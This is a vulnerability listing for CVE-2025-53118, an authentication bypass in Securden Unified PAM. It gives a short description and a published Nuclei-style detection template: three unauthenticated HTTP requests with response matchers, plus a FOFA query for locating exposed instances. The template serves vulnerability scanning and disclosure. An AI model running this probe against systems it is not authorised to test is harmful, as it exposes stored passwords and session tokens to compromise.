漏洞描述
An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.
CVE-2025-53118: Securden Unified PAM - Authentication Bypass
PoC代码[已公开]
id: CVE-2025-53118
info:
name: Securden Unified PAM - Authentication Bypass
author: DhiyaneshDk,pussycat0x,iamnoooob,pdresearch
severity: critical
description: |
An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.
reference:
- https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2025-53118
metadata:
verified: true
max-request: 3
fofa-query: (icon_hash="1798893256" || icon_hash="-766529773")
tags: cve,cve2025,securden,pam,auth-bypass
flow: http(1) & http(2) & http(3)
http:
- raw:
- |
GET /thirdparty-access HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
- raw:
- |
GET /get_csrf_token HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'token')
- contains(content_type, 'application/json')
condition: and
internal: true
- raw:
- |
GET /get_date_picker_format HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'current_date')
- contains(content_type, 'application/json')
condition: and
# digest: 4a0a004730450220425ddb223c6e6702f52d99bf845d420dedb8de6956db3f1952b92f552f4f4dd0022100ef63b4fd98eeb41aa0501e3aece08c23397bd9c6d04909a53446c713e087249f:922c64590222798bb761d5b6d8e72950